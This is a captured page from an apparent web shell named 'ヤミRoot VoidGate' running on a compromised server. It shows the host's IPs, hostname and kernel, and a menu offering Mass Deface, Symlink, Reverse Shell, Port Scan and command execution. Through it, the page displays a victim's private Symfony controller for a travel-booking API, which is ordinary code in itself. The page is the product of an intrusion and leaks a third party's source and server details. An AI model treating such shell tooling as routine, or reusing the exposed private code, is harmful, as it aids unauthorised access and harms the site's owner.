ヤミRoot VoidGate
User / IP
:
216.73.216.137
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
src
/
AppBundle
/
Controller
/
Api
/
Viewing: TravelBookingController.php
<?php namespace AppBundle\Controller\Api; use Nelmio\ApiDocBundle\Annotation as Doc; use FOS\RestBundle\Controller\FOSRestController; use Symfony\Component\HttpFoundation\Request; use Symfony\Component\HttpFoundation\JsonResponse; use FOS\RestBundle\Controller\Annotations as Rest; use Sensio\Bundle\FrameworkExtraBundle\Configuration\ParamConverter; use Sensio\Bundle\FrameworkExtraBundle\Configuration\Security; use AppBundle\Entity\Travel; use AppBundle\Entity\Ticket; use AppBundle\Entity\Booking; use AppBundle\Entity\Customer; use AppBundle\Form\BookingType; class TravelBookingController extends FOSRestController { /** * Get the list of all bookings related to a travel * * @Rest\Get("/travels/{travelId}/bookings") * @Rest\View( * statusCode = JsonResponse::HTTP_OK, * SerializerGroups = {"LIST", "STANDING_DETAILS", "BOOKING_DETAILS"} * ) * @Doc\ApiDoc( * section="Bookings", * resource=true, * description="Get the list of all bookings related to a travel.", * ) * @Security("has_role('ROLE_OPERATOR')") */ public function listAction(Travel $travel) { $bookings= $this ->getDoctrine() ->getManager() ->getRepository("AppBundle:Booking") ->findByTravel($travel); return $bookings; } /** * Get one booking which is related to a travel. * @param integer $travelId The id of the travel * @param integer $bookinglId The id of the bookings * @Rest\Get("/travels/{travelId}/bookings/{bookingId}") * @Rest\View( * statusCode= JsonResponse::HTTP_OK, * SerializerGroups = {"LIST", "BOOKING_DETAILS"} *) * @Doc\ApiDoc( * section="Bookings", * resource=true, * description=" Get one booking which is related to a travel.", * ) * @Security("has_role('ROLE_CUSTOMER') or has_role('ROLE_OPERATOR')") */ public function showAction(Booking $booking) { return $booking; } /** * Create a booking for a travel * <p> * The body of the request must be <br /> * { <br /> * "customerId": X, <br /> * "sitNumber": Y, <br /> * } * </p> * where X is the id of an existing Customer. * * @param integer $travelId The id of the travel * * @Rest\Post("/travels/{travelId}/bookings") * @Rest\View( * statusCode = JsonResponse::HTTP_CREATED, * SerializerGroups = {"LIST", "BOOKING_DETAILS"} *) * @Doc\ApiDoc( * section="Bookings", * resource=true, * description=" Create a booking for a travel.", * ) * @Security("has_role('ROLE_CUSTOMER') or has_role('ROLE_OPERATOR')") */ public function createAction(Request $request, Travel $travel) { $bookingManager = $this->get('booking_manager'); $em = $this->getDoctrine()->getManager(); // fetching the customer who will travel if($request->request->has("customerId")){ $customerId = $request->request->get('customerId'); $customer = $em ->getRepository('AppBundle:Customer') ->find($customerId); if ($customer == null) { return new JsonResponse(['Error' => 'no customer with id: '.$customerId], JsonResponse::HTTP_BAD_REQUEST); } }else { return new JsonResponse(['Error' => 'missing value for "customerId". '], JsonResponse::HTTP_BAD_REQUEST); } if($request->request->has("sitNumber")){ $sitNumber = $request->request->get('sitNumber'); }else { return new JsonResponse(['Error' => 'missing value for "sitNumber". '], JsonResponse::HTTP_BAD_REQUEST); } // The user making the booking $connectedUser = $this->get('security.token_storage')->getToken()->getUser(); if ($connectedUser instanceof Customer){ $bookingMaker = $connectedUser; }else { $bookingMaker = null; } return $bookingManager->createBooking($travel, $customer, $bookingMaker, $sitNumber); } /** * Update a Booking * <p> * The body of the request must be <br /> * { <br /> * "sitNumber": Y, <br /> * "newTravelId": X, <br /> * } <br /> * <b>Note</b> The field newTravelId must be specified if we are trying to change the travel concerned by the booking. * </p> * where X is the id of an existing Customer. * @param integer $travelId The id of the travel * @Rest\Put("/travels/{travelId}/bookings/{bookingId}") * @Rest\View( * statusCode = JsonResponse::HTTP_ACCEPTED, * SerializerGroups = {"LIST", "BOOKING_DETAILS"} *) * @Doc\ApiDoc( * section="Bookings", * resource=true, * description=" Update a booking for a travel.", * ) * @Security("has_role('ROLE_CUSTOMER') or has_role('ROLE_OPERATOR')") */ public function updateAction(Request $request, Travel $travel, Booking $booking) { /** * We can update only the sitNumber */ $em = $this->getDoctrine()->getManager(); $travelManager = $this->get('travel_manager'); /** * Processing verifications about the requested sit number */ $sitNumber = $request->request->get('sitNumber'); $newTravelId = $request->request->get('newTravelId'); if($newTravelId){ $newTravel = $em ->getRepository('AppBundle:Travel') ->find($newTravelId); if($travelManager->hasFreeSits($newTravel)) { // call to 'bookingManger' to check if the cost check allow travel reassignment. if($booking->getTicket()->getPaidInFull() == true ) { if($newTravel->getTravelConfig()->getLineStanding()->getSitCost() <= $travel->getTravelConfig()->getLineStanding()->getSitCost()) $travel = $newTravel; }else{ $travel = $newTravel; } } } if($sitNumber) { if($travelManager->isBooked($travel, $sitNumber)) { return new JsonResponse(['Error' => 'this sit is already booked'], JsonResponse::HTTP_FORBIDDEN); } $booking->setTravel($travel); $booking->setSitNumber($sitNumber); }else { $booking->setTravel($travel); } $em->flush(); return $booking; } /** * Delete a Booking * @param integer $travelId The id of the travel * @Rest\Delete("/travels/{travelId}/bookings/{bookingId}") * @Rest\View( * statusCode = JsonResponse::HTTP_OK * ) */ public function deleteAction(Booking $booking) { return new JsonResponse(['Error' => 'TODO'], JsonResponse::HTTP_FORBIDDEN); } }
Coded With 💗 by
0x6ick